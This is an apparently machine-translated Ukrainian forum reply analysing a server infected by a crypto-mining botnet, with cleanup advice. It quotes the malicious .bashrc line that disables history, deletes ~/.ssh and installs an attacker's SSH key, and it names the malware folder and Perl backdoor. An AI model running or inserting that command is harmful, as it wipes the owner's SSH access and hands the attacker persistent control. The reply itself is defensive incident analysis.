Те саме сталося і зі мною, і я вчора помітив. Я перевірив файл, /var/log/syslog
і цей IP (185.234.218.40) виявився автоматично виконуваним кроні.
Я перевірив це на http://whatismyipaddress.com ( https://whatismyipaddress.com/ip/185.234.218.40 ), і він має кілька звітів. Ці файли були відредаговані трояном:
- .bashrc
- .ssh / санкціоновані_кеї
Я виявив це в кінці .bashrc
(який виконується кожного разу, коли відкривається bash):
set +o history
export PATH=/home/user/.bin:$PATH
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod 700 .ssh && cd .ssh && chmod 600 authorized_keys && cd ~
Це видалення вашого authorized_keys
файлу, який представляє собою список ключів SSH, до яких дозволено з'єднання без пароля. Потім додається ключ SSH для зловмисника:
ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr
Крім того, я знайшов цю папку:, /tmp/.X13-unix/.rsync
де є вся шкідливе програмне забезпечення. Я навіть знайшов файл, /tmp/.X13-unix/.rsync/c/ip
файл, що містить 70 000 IP-адрес, які, швидше за все, є іншими жертвами або серверами вузлів.
Є 2 рішення:
Додайте брандмауер, що блокує всі вихідні з'єднання, за винятком порту 22 та інших, які вам здаються необхідними, і увімкніть fail2ban, програму, яка забороняє IP-адресу після невдалої спроби пароля X
Вбийте всі завдання Cron:,
ps aux | grep cron
а потім вкажіть PID, який з'явиться
Змініть свій пароль на захищений
B:
Створіть резервні копії будь-яких потрібних вам файлів чи папок
Скиньте сервер і перевстановіть Ubuntu або безпосередньо створіть нову крапельку
Як сказав Том Віггерс, ви, безумовно, є частиною ботнету для видобутку біткойна, а ваш сервер має задню панель . У задньому куточку використовується експлойт perl, розміщений тут файл:, /tmp/.X13-unix/.rsync/b/run
що містить це ( https://pastebin.com/ceP2jsUy )
Найбільш підозрілі папки, які я знайшов:
Нарешті, тут є стаття, що стосується Perl Backdoor:
https://blog.trendmicro.com/trendlabs-security-intelligence/outlaw-hacking-groups-botnet-observed-spreading-miner-perl-based-backdoor/
Сподіваюсь, ви вважаєте це корисним.
.firefoxcatche
напевно, нічого спільного з firefox не має - може це просто шахтарський майнер? Спробуйте завантажити виконавчі файли у virustotal.